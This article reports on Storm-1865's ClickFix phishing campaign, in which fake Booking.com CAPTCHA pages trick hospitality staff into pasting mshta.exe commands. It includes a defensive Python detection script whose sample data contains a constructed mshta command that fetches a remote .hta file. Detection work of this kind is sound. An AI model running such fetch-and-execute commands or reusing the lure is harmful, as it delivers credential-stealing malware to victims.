Microsoft Threat Intelligence has identified an ongoing phishing campaign that began in December 2024, targeting organizations in the hospitality industry by impersonating the online travel agency Booking.com.
The campaign, attributed to the threat actor tracked as Storm-1865, employs a social engineering technique called ClickFix to deliver credential-stealing malware used for financial fraud and theft.

This attack specifically targets hospitality organizations across North America, Oceania, South and Southeast Asia, and various European regions, focusing on individuals likely to work directly with Booking.com.
As of February 2025, the campaign remains active and continues to evolve its tactics to bypass conventional security measures.

Deceptive Tactics Target Hospitality Staff Through Fraudulent Communications
The Storm-1865 threat actors have developed a methodical approach to infiltrating hospitality organizations by first identifying potential targets within these businesses who are likely to interact with Booking.com as part of their regular duties.
The attackers then craft malicious emails that impersonate the travel platform, with message content varying widely to increase the chances of engagement.
These fraudulent communications reference scenarios that would concern hospitality staff, including negative guest reviews, requests from prospective guests, online promotion opportunities, and account verification notifications.
Each email contains either a malicious link or a PDF attachment with an embedded link, purportedly directing recipients to the legitimate Booking.com website.
When users click on these links, they are directed to a convincing fake webpage that displays a counterfeit CAPTCHA overlay against a background designed to mimic the authentic Booking.com interface.
This deceptive design creates the illusion that Booking.com has implemented additional verification checks, which may give targeted users a false sense of security and increase the likelihood of compromise.
The attack methodology demonstrates a sophisticated understanding of the hospitality industry’s operations and effectively exploits the trusted relationship between hotels and the popular booking platform to deliver malicious payloads.
ClickFix Social Engineering Technique Enables Delivery of Multiple Malware Families
At the core of this campaign is the ClickFix social engineering technique, which represents an evolution in the threat actor’s approach to bypassing security measures.
This technique takes advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct users to perform specific actions to resolve supposed issues.
In this specific implementation, the fake CAPTCHA overlay instructs users to use a keyboard shortcut to open a Windows Run window, then paste and execute a command that the phishing page has surreptitiously added to the user’s clipboard.

This requirement for direct user interaction helps the attack evade automated security features that might otherwise detect and block malicious scripts.
The command executed through this method typically leverages mshta.exe to download and launch malicious code, which varies depending on the specific payload being delivered.
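As an added illustration of how a defender can spot the execution step described above, the following Python (example code, not from Microsoft's report or this article) scores constructed process-creation events for mshta.exe launched with a remote URL, rating the hit higher when the parent is explorer.exe, which is the parent of commands pasted into the Run dialog. The event field names and sample values are assumptions modelled on Sysmon process-creation telemetry.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process creation) fields;
# not real telemetry from the campaign, and hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha-check.example.invalid/verify.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta C:\Tools\inventory.hta"},
    {"ParentImage": r"C:\Program Files\Vendor\agent.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://intranet.example.invalid/report.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": "firefox.exe https://www.booking.com/"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (severity, reason) for one event; severity is None when it does not match.

    high:   mshta.exe given a remote URL and spawned by explorer.exe, the parent
            seen when a command is pasted into the Run dialog as ClickFix instructs.
    medium: mshta.exe given a remote URL from any other parent process.
    """
    if basename(event["Image"]) != "mshta.exe":
        return None, ""
    url = URL_RE.search(event["CommandLine"])
    if not url:
        return None, ""  # local .hta files are common in admin tooling
    if basename(event["ParentImage"]) == "explorer.exe":
        return "high", "Run-dialog style mshta.exe launch fetching " + url.group(0)
    return "medium", "mshta.exe fetching remote content from " + url.group(0)


def triage(events):
    """Return the matching events with severity and reason attached."""
    hits = []
    for event in events:
        severity, reason = classify(event)
        if severity:
            hits.append({"severity": severity, "reason": reason, **event})
    return hits
```

Run against real process-creation telemetry, the high-severity matches are the ones to pair with the user's recent Run dialog history when confirming a ClickFix incident.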

Microsoft has identified multiple families of commodity malware being distributed through this campaign, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.
Each of these malware variants possesses capabilities designed to steal financial data and credentials for fraudulent use, which aligns with the historical patterns observed in Storm-1865 activity.
The adoption of the ClickFix technique represents a significant evolution in the threat actor’s tactics, techniques, and procedures (TTPs), demonstrating their ongoing efforts to circumvent conventional security measures targeting phishing and malware distribution.

Protective Measures and Organizational Defenses Against Sophisticated Phishing Threats
Organizations can implement several strategies to protect themselves against this sophisticated phishing campaign and similar threats.
Education remains a critical component of defense, with staff training focused on identifying suspicious emails by checking sender addresses, being wary of urgent calls to action, hovering over links before clicking, and watching for typographical errors that often indicate phishing attempts.
Technical countermeasures also play a vital role in organizational protection against these threats.
Microsoft recommends deploying phishing-resistant authentication methods, enforcing multi-factor authentication (MFA) on all accounts, configuring Microsoft Defender for Office 365 to recheck links on click, and encouraging users to use web browsers that support protective features such as Microsoft Defender SmartScreen.
Additional technical defenses include enabling cloud-delivered protection in antivirus products, implementing network protection to prevent access to malicious domains, enabling automated investigation and remediation capabilities, and activating Zero-hour auto purge (ZAP) in Office 365 to quarantine malicious messages.
Indicators of Compromise